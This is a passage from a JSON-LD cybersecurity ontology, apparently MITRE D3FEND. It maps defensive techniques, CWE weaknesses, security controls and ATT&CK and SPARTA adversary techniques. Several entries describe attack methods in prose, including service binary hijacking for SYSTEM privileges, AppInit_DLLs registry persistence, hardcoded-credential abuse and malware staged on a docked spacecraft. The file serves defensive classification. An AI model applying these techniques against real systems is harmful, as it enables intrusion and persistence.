      "d3f:definition": "Adversaries may leverage credentials that are hardcoded in software or firmware to gain an unauthorized interactive user session to an asset. Examples credentials that may be hardcoded in an asset include:",
      "rdfs:label": "Hardcoded Credentials - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSLateralMovementTechnique"
        },
        {
          "@id": "d3f:ATTACKICSPersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Hardcoded Credentials"
    },
    {
      "@id": "d3f:CWE-450",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-450",
      "d3f:definition": "The UI has multiple interpretations of user input but does not prompt the user when it selects the less secure interpretation.",
      "rdfs:label": "Multiple Interpretations of UI Input",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-357"
      }
    },
    {
      "@id": "d3f:ProcessCodeSegmentVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessCodeSegmentVerification"
      ],
      "d3f:d3fend-id": "D3-PCSV",
      "d3f:definition": "Comparing the \"text\" or \"code\" memory segments to a source of truth.",
      "d3f:kb-article": "## How it works\nA process code segment is an executable portion of computer memory allocated to a particular process. Process Code Segment Verification implements verification to compare a process code segment to some expected value.\n\n### Verification logic\nVerification can occur during application startup, or continuously during execution. The logic which verifies the process code may be separate in a third-party process, embedded in the application itself at compile time, or dynamically linked at runtime.\n\n### System of record\nExamples of systems of record:\n\n * On-disk application binary files or checksums\n * Remotely stored binary data or checksums\n * Embedded binary data or checksums\n\n### Post Verification Actions\nIf the verification function determines a process code segment may have been altered, a capability may invoke Eviction techniques  as **Process Termination** to end the current process, or **Executable Blacklisting** to prevent the executable from launching in the future.\n\n## Considerations\n\n### False positives\n\nFalse positives commonly occur in the case that the layout of code in the process segment is legitimately modified:\n\n*  Operating system features or third-party security software may modify the layout of process code, for example in the defensive technique **Segment Address Offset Randomization**, or in the case that a module is rebased.  In both of these cases, the alteration occurs before the code is fully loaded into memory, and it would be possible to avoid the false positive by securely feeding this constant offset and any relocation data into the verification logic.\n\n* Process code segments may be written to modify themselves or other process code segments; however, this goes against widely-accepted current practices in software development.\n\n### False negatives\n\nFalse negatives can occur via alteration of the verification logic or source of truth, or insufficient verification logic.\n\n* Verification techniques which are executed only locally may be defeated by altering the local verification logic.\n\n* Verification that is run only on a recurring basis could be evaded if the malicious alteration is completed before verification is run.\n\n* Verification that requests an operation to be performed on a subset of the code segment could be evaded by performing that operation on a copy of the relevant bytes of the code segment.\n\n* Verification based on a system of record that can be altered may fail if that system of record is modifiable by a malicious user.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-Anti-tamperSystemWithSelf-adjustingGuards_ARXANTECHNOLOGIESInc"
        },
        {
          "@id": "d3f:Reference-GuardsForApplicationInSoftwareTamperproofing_PurdueResearchFoundation"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForDetectingMalwareInjectedIntoMemoryOfAComputingDevice_EndgameInc"
        },
        {
          "@id": "d3f:Reference-SystemAndMethodForValidatingIn-memoryIntegrityOfExecutableFilesToIdentifyMaliciousActivity_EndgameInc"
        },
        {
          "@id": "d3f:Reference-TamperProofMutatingSoftware_ARXANTECHNOLOGIESInc"
        },
        {
          "@id": "d3f:Reference-ThreatDetectionThroughTheAccumulatedDetectionOfThreatCharacteristics_SophosLtd"
        }
      ],
      "d3f:verifies": {
        "@id": "d3f:ProcessCodeSegment"
      },
      "rdfs:label": "Process Code Segment Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:Ne984e41855d44eefbdb5a75c119d1775"
        }
      ]
    },
    {
      "@id": "_:Ne984e41855d44eefbdb5a75c119d1775",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:verifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "d3f:T1578.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1578.001",
      "d3f:creates": {
        "@id": "d3f:ComputingSnapshot"
      },
      "d3f:definition": "An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.",
      "rdfs:label": "Create Snapshot",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1578"
        },
        {
          "@id": "_:N567ca99f9d01494db50a80b15ad4d089"
        }
      ]
    },
    {
      "@id": "_:N567ca99f9d01494db50a80b15ad4d089",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ComputingSnapshot"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-8_22",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Security and Privacy Engineering Principles | Accountability and Traceability",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:DomainAccountMonitoring"
      },
      "rdfs:label": "SA-8(22)"
    },
    {
      "@id": "d3f:CWE-222",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-222",
      "d3f:definition": "The product truncates the display, recording, or processing of security-relevant information in a way that can obscure the source or nature of an attack.",
      "rdfs:label": "Truncation of Security-relevant Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-221"
      }
    },
    {
      "@id": "d3f:Spacecraft",
      "@type": "owl:Class",
      "d3f:definition": "A spacecraft is a vehicle that is designed to fly and operate in outer space. Spacecraft are used for a variety of purposes, including communications, Earth observation, meteorology, navigation, space colonization, planetary exploration, and transportation of humans and cargo.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Spacecraft"
      },
      "rdfs:label": "Spacecraft",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Vehicle"
        },
        {
          "@id": "_:Nc10ef487af854cd5a773e6e593f7c9d2"
        },
        {
          "@id": "_:N1fad0f68ee2e46a384fc3e999b256ac8"
        },
        {
          "@id": "_:N13e55bbd2408404a84584e40d7885c4c"
        },
        {
          "@id": "_:Nc89acc20727246ed93ec0a4d36b5dae0"
        },
        {
          "@id": "_:Nf220faa992f24cda9fa04faa6aedf96b"
        },
        {
          "@id": "_:N091c868f843d4c5eb3c39afaacfdd113"
        },
        {
          "@id": "_:N6c5dc59b339c4b5ab8dc78e69b8ca484"
        },
        {
          "@id": "_:N7f4919bb87aa47a5a275c658fe559bb7"
        },
        {
          "@id": "_:Naaaf2136a9444867a3127d3fe0996e02"
        }
      ]
    },
    {
      "@id": "_:Nc10ef487af854cd5a773e6e593f7c9d2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OnboardComputer"
      }
    },
    {
      "@id": "_:N1fad0f68ee2e46a384fc3e999b256ac8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Receiver"
      }
    },
    {
      "@id": "_:N13e55bbd2408404a84584e40d7885c4c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Transmitter"
      }
    },
    {
      "@id": "_:Nc89acc20727246ed93ec0a4d36b5dae0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-operating-mode"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingMode"
      }
    },
    {
      "@id": "_:Nf220faa992f24cda9fa04faa6aedf96b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BusNetwork"
      }
    },
    {
      "@id": "_:N091c868f843d4c5eb3c39afaacfdd113",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GNSSReceiver"
      }
    },
    {
      "@id": "_:N6c5dc59b339c4b5ab8dc78e69b8ca484",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareCryptographicModule"
      }
    },
    {
      "@id": "_:N7f4919bb87aa47a5a275c658fe559bb7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioComputer"
      }
    },
    {
      "@id": "_:Naaaf2136a9444867a3127d3fe0996e02",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TransducerSensor"
      }
    },
    {
      "@id": "d3f:EquivalenceMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EM",
      "d3f:definition": "Equivalence matching is matching two values, which may be bound to variables, to see if they are equivalent.",
      "d3f:kb-article": "## How it works\nEquality is a relationship between two quantities or, more generally two mathematical expressions, asserting that the quantities have the same value, or that the expressions represent the same mathematical object.\n\nProgramming languages can have multiple senses of equality that may include, but are not limited to:\n\n- Identity: The objects are identical; often indicated by having values indicating the same logical address.\n- Equality: The values of the expessions and properties are equivalent when evaluated; they do not need to have the same logical address.\n\n## References\n1. Equality (mathematics). (2023, May 31). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Equality_(mathematics)]\n2. Types of Equality. (2007, March 2). In _WikiWikiWeb_. [Link](https://wiki.c2.com/?TypesOfEquality)",
      "rdfs:label": "Equivalence Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:LogicalRules"
      }
    },
    {
      "@id": "d3f:ApplicationUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event describing changes made to an application, such as updates, reconfigurations, or patch installations, while maintaining its presence on the system.",
      "rdfs:label": "Application Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:N4a36d37ed1234b0c81187071774f7eb5"
        }
      ]
    },
    {
      "@id": "_:N4a36d37ed1234b0c81187071774f7eb5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationInstallationEvent"
      }
    },
    {
      "@id": "d3f:WebScriptFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A file containing a script in a web-scripting programming language. Web scripts may be present and run on the client or on the server side.",
      "rdfs:label": "Web Script File",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutableScript"
      },
      "skos:altLabel": "Web Script"
    },
    {
      "@id": "d3f:HardwareDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the existence, state, or interaction of hardware or virtual devices within a system. Device events encompass activities such as discovery, connection, disconnection, operational state changes, or configuration modifications, providing visibility into device behavior and health.",
      "rdfs:label": "Hardware Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N31b641026ebf471d9e897f68844a7bda"
        }
      ]
    },
    {
      "@id": "_:N31b641026ebf471d9e897f68844a7bda",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:PhysicalLinkEvent",
      "@type": "owl:Class",
      "d3f:definition": "A discrete event that changes either the presence of the transmission medium or the operational state of a single-hop layer-1 link between two network nodes.",
      "rdfs:label": "Physical Link Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkDeviceEvent"
        },
        {
          "@id": "_:Naf1ffff231bd4b67960a476bcd730719"
        }
      ]
    },
    {
      "@id": "_:Naf1ffff231bd4b67960a476bcd730719",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLink"
      }
    },
    {
      "@id": "d3f:text",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "The text of the document (i.e., terms of license.)",
      "rdfs:label": {
        "@language": "en",
        "@value": "text"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:IA-0005.02",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0005.02",
      "d3f:definition": "Docking, berthing, or service capture during on-orbit servicing, assembly, and manufacturing (OSAM) creates a high-trust bridge between vehicles. Threat actors exploit this moment, either by pre-positioning code on a servicing vehicle or by manipulating ground updates to it, so that, once docked, lateral movement occurs across the mechanical/electrical interface. Interfaces may expose power and data umbilicals, standardized payload ports, or gateways into the target’s C&DH or payload networks (e.g., SpaceWire, Ethernet, 1553). Service tools that push firmware, load tables, transfer files, or share time/ephemeris become conduits for staged procedures or implants that execute under maintenance authority. Malware can be timed to activation triggers such as “link up,” “maintenance mode entered,” or specific device enumerations that only appear when docked. Because OSAM operations are scheduled and well-documented, the adversary can align preparation with published timelines, ensuring that the first point of execution coincides with the brief window when cross-vehicle trust is intentionally elevated.",
      "rdfs:label": "Docked Vehicle / OSAM - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0005/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:IA-0005"
      },
      "skos:prefLabel": "Docked Vehicle / OSAM"
    },
    {
      "@id": "d3f:CWE-1241",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1241",
      "d3f:definition": "The device uses an algorithm that is predictable and generates a pseudo-random number.",
      "rdfs:label": "Use of Predictable Algorithm in Random Number Generator",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:Reference-SMBWriteRequest_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-05-003/"
      },
      "d3f:kb-abstract": "As described in CAR-2013-01-003, SMB provides a means of remotely managing a file system. Adversaries often use SMB to move laterally to a host. SMB is commonly used to upload files. It may be used for staging in Exfiltration or as a Lateral Movement technique. Unlike SMB Reads, SMB Write requests typically require an additional level of access, resulting in less activity. Focusing on SMB Write activity narrows the field to find techniques that actively change remote hosts, instead of passively reading files.",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "",
      "d3f:kb-reference-of": {
        "@id": "d3f:IPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2013-05-003: SMB Write Request",
      "rdfs:label": "Reference - CAR-2013-05-003: SMB Write Request - MITRE"
    },
    {
      "@id": "d3f:display-priority",
      "@type": "owl:AnnotationProperty",
      "rdfs:label": "display-priority",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-display-annotation"
      }
    },
    {
      "@id": "d3f:DialUpModem",
      "@type": "owl:Class",
      "d3f:definition": "A dial-up modem transmits computer data over an ordinary switched telephone line that has not been designed for data use. This contrasts with leased line modems, which also operate over lines provided by a telephone company, but ones which are intended for data use and do not impose the same signaling constraints. The modulated data must fit the frequency constraints of a normal voice audio signal, and the modem must be able to perform the actions needed to connect a call through a telephone exchange, namely: picking up the line, dialing, understanding signals sent back by phone company equipment (dial tone, ringing, busy signal,) and on the far end of the call, the second modem in the connection must be able to recognize the incoming ring signal and answer the line.",
      "rdfs:isDefinedBy": {
        "@id": "http://dbpedia.org/resource/Modem#Dial-up"
      },
      "rdfs:label": "Dial Up Modem",
      "rdfs:subClassOf": {
        "@id": "d3f:Modem"
      }
    },
    {
      "@id": "d3f:Token-basedAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:Token-basedAuthentication"
      ],
      "d3f:d3fend-id": "D3-TBA",
      "d3f:definition": "Token-based authentication is an authentication protocol where users verify their identity in exchange for a unique access token. Users can then access the website, application, or resource for the life of the token without having to re-enter their credentials.",
      "d3f:kb-article": "## How it works\n\nToken-based authentication starts with a user logging into a system, device or application, typically using a password or a security question. An authorization server validates that initial authentication and then issues an access token, which is a small piece of data that lets a client application make a secure call or signal to an API server. Once this initial token-based authentication protocol is completed, the token works like a stamped ticket: The user can continue to seamlessly access the relevant resources, without re-authenticating, for the duration of the token lifecycle. That lifecycle ends when the user logs out or quits an app — and can also be triggered by a set time-out protocol.\n\n## Considerations:\n\nWhile token-based authentication is undoubtedly a major step above traditional password-based authentication, the token is still considered a “bearer token” — that is, access is granted to whomever holds the token.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Entrust-What-Is-Token-Based-Authentication"
      },
      "d3f:uses": {
        "@id": "d3f:AccessToken"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://www.entrust.com/resources/learn/what-is-token-based-authentication"
      },
      "rdfs:label": "Token-based Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AgentAuthentication"
        },
        {
          "@id": "_:Nff3f491925c64f5280b6abcab97045de"
        }
      ]
    },
    {
      "@id": "_:Nff3f491925c64f5280b6abcab97045de",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:CCI-002357_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements a reference monitor for organization-defined access control policies that is tamperproof.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-25T00:00:00"
      },
      "rdfs:label": "CCI-002357"
    },
    {
      "@id": "d3f:T1574.010",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.010",
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.",
      "d3f:modifies": {
        "@id": "d3f:ServiceApplication"
      },
      "rdfs:label": "Services File Permissions Weakness",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:Ndb67f3809dfc4dca8d1e7969a610660f"
        }
      ],
      "skos:altLabel": "Service Registry Permissions Weakness"
    },
    {
      "@id": "_:Ndb67f3809dfc4dca8d1e7969a610660f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:T1103",
      "@type": "owl:Class",
      "d3f:attack-id": "T1103",
      "d3f:definition": "Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> or <code>HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.010",
      "rdfs:label": "AppInit DLLs",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.010"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1428",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1428",
      "d3f:definition": "The product provides or relies on use of HTTP communications when HTTPS is available.",
      "rdfs:label": "Reliance on HTTP instead of HTTPS",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-319"
      }
    },
    {
      "@id": "d3f:WindowsQueryPerformanceCounter",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Retrieves the current value of the performance counter, which is a high resolution (<1us) time stamp that can be used for time-interval measurements.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNtQuerySystemTime"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/profileapi/nf-profileapi-queryperformancecounter"
      },
      "rdfs:label": "Windows QueryPerformanceCounter",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIGetSystemTime"
        },
        {
          "@id": "_:N1d469a8fdc114f8ca0280a7aa3ec6a99"
        }
      ]
    },
    {
      "@id": "_:N1d469a8fdc114f8ca0280a7aa3ec6a99",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtQuerySystemTime"
      }
    },
    {
      "@id": "d3f:T1674",
      "@type": "owl:Class",
      "d3f:attack-id": "T1674",
      "d3f:definition": "Adversaries may simulate keystrokes on a victim’s computer by various means to perform any type of action on behalf of the user, such as launching the command interpreter using keyboard shortcuts,  typing an inline script to be executed, or interacting directly with a GUI-based application.  These actions can be preprogrammed into adversary tooling or executed through physical devices such as Human Interface Devices (HIDs).",
      "rdfs:label": "Input Injection",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:ExfiltrationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to steal data.",
      "d3f:enables": {
        "@id": "d3f:TA0010"
      },
      "rdfs:label": "Exfiltration Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N6fa50a8e13c34e0ca8ad7727eea05e9d"
        }
      ]
    },
    {
      "@id": "_:N6fa50a8e13c34e0ca8ad7727eea05e9d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0010"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndApparatusForNetworkFraudDetectionAndRemediationThroughAnalytics_IdaptiveLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190081968A1/en"
      },
      "d3f:kb-abstract": "A system and method for assessing the identity fraud risk of an entity's (a user's, computer process's, or device's) behavior within a computer network and then to take appropriate action. The system uses real-time machine learning for its assessment. It records the entity's log-in behavior (conditions at log-in) and behavior once logged in to create an entity profile that helps identify behavior patterns. The system compares new entity behavior with the entity profile to determine a risk score and a confidence level for the behavior. If the risk score and confidence level indicate a credible identity fraud risk at log-in, the system can require more factors of authentication before log-in succeeds. If the system detects risky behavior after log-in, it can take remedial action such as ending the entity's session, curtailing the entity's privileges, or notifying a human administrator.",
      "d3f:kb-author": "Yanlin Wang; Weizhi Li",
      "d3f:kb-mitre-analysis": "This patent describes determining a confidence score to detect anomalies in user activity based on comparing a user's behavior profile with current user activity events.  The following types of events are used to develop a user entity profile:\n\n* logon and logoff times and locations\n* starting or ending applications\n* reading or writing files\n* changing an entity 's authorization\n* monitoring network traffic\n\nUser events that deviate from the entity profile over a certain threshold trigger a remedial action.",
      "d3f:kb-organization": "Idaptive LLC",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:AuthenticationEventThresholding"
        },
        {
          "@id": "d3f:AuthorizationEventThresholding"
        },
        {
          "@id": "d3f:ResourceAccessPatternAnalysis"
        },
        {
          "@id": "d3f:SessionDurationAnalysis"
        },
        {
          "@id": "d3f:UserGeolocationLogonPatternAnalysis"
        }
      ],
      "d3f:kb-reference-title": "Method and Apparatus for Network Fraud Detection and Remediation Through Analytics",
      "rdfs:label": "Reference - Method and Apparatus for Network Fraud Detection and Remediation Through Analytics - Idaptive LLC"
    },
    {
      "@id": "d3f:T1156",
      "@type": "owl:Class",
      "d3f:attack-id": "T1156",
      "d3f:definition": "Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command line interface or remotely logs in (such as SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use <code>/etc/profile</code> when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.004",
      "rdfs:label": "Malicious Shell Modification",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:LinuxPtraceArgumentPTRACEPEEKTEXT",
      "@type": "owl:Class",
      "d3f:definition": "Read a word at the address addr in the tracee's memory, returning the word as the result of the ptrace() call.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/ptrace.2.html"
      },
      "rdfs:label": "Linux Ptrace Argument PTRACE_PEEKTEXT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIReadMemory"
      }
    },
    {
      "@id": "d3f:TimerExpirationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which a software timer reaches its configured duration and triggers associated actions (callbacks, interrupts, or signals).",
      "rdfs:label": "Timer Expiration Event",
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwareTimerEvent"
      }
    },
    {
      "@id": "d3f:CWE-1330",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1330",
      "d3f:definition": "Confidential information stored in memory circuits is readable or recoverable after being cleared or erased.",
      "rdfs:label": "Remanent Data Readable after Memory Erase",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1301"
      }
    },
    {
      "@id": "d3f:ContainerImage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A container is a standard unit of software that packages up code and all its dependencies so the application runs quickly and reliably from one computing environment to another. A Docker container image is a lightweight, standalone, executable package of software that includes everything needed to run an application: code, runtime, system tools, system libraries and settings.\n\nContainer images become containers at runtime and in the case of Docker containers - images become containers when they run on Docker Engine. Available for both Linux and Windows-based applications, containerized software will always run the same, regardless of the infrastructure. Containers isolate software from its environment and ensure that it works uniformly despite differences for instance between development and staging.",
      "rdfs:isDefinedBy": {
        "@id": "https://www.docker.com/resources/what-container"
      },
      "rdfs:label": "Container Image",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/image"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ComputingImage"
        },
        {
          "@id": "d3f:SoftwarePackage"
        }
      ]
    },
    {
      "@id": "d3f:T0836",
      "@type": "owl:Class",
      "d3f:attack-id": "T0836",
      "d3f:definition": "Adversaries may modify parameters used to instruct industrial control system devices. These devices operate via programs that dictate how and when to perform actions based on such parameters. Such parameters can determine the extent to which an action is performed and may specify additional options. For example, a program on a control system device dictating motor processes may take a parameter defining the total number of seconds to run that motor.",
      "rdfs:label": "Modify Parameter - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpairProcessControlTechnique"
      },
      "skos:prefLabel": "Modify Parameter"
    },
    {
      "@id": "d3f:ShortcutFile",
      "@type": "owl:Class",
      "d3f:definition": "A shortcut file, or shortcut, is a handle that allows the user to find a file or resource located in a different directory or folder from the place where the shortcut is located.\n\nShortcuts, which are supported by the graphical file browsers of some operating systems, may resemble symbolic links but differ in a number of important ways. One difference is what type of software is able to follow them:\n\n - Symbolic links are automatically resolved by the file system. Any software program, upon accessing a symbolic link, will see the target instead, whether the program is aware of symbolic links or not.\n\n - Shortcuts are treated like ordinary files by the file system and by software programs that are not aware of them. Only software programs that understand shortcuts (such as the Windows shell and file browsers) treat them as references to other files.\n\nAnother difference are the capabilities of the mechanism:\n\n - Microsoft Windows shortcuts normally refer to a destination by an absolute path (starting from the root directory), whereas POSIX symbolic links can refer to destinations via either an absolute or a relative path. The latter is useful if both the location and destination of the symbolic link share a common path prefix[clarification needed], but that prefix is not yet known when the symbolic link is created (e.g., in an archive file that can be unpacked anywhere).\n\n- Microsoft Windows application shortcuts contain additional metadata that can be associated with the destination, whereas POSIX symbolic links are just strings that will be interpreted as absolute or relative pathnames.\n\n- Unlike symbolic links, Windows shortcuts maintain their references to their targets even when the target is moved or renamed. Windows domain clients may subscribe to a Windows service called Distributed Link Tracking to track the changes in files and folders to which they are interested. The service maintains the integrity of shortcuts, even when files and folders are moved across the network.[14] Additionally, in Windows 9x and later, Windows shell tries to find the target of a broken shortcut before proposing to delete it.",
      "rdfs:label": "Shortcut File",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Shortcut_(computing)"
        },
        {
          "@id": "http://dbpedia.org/resource/Symbolic_link#Shortcuts"
        }
      ],
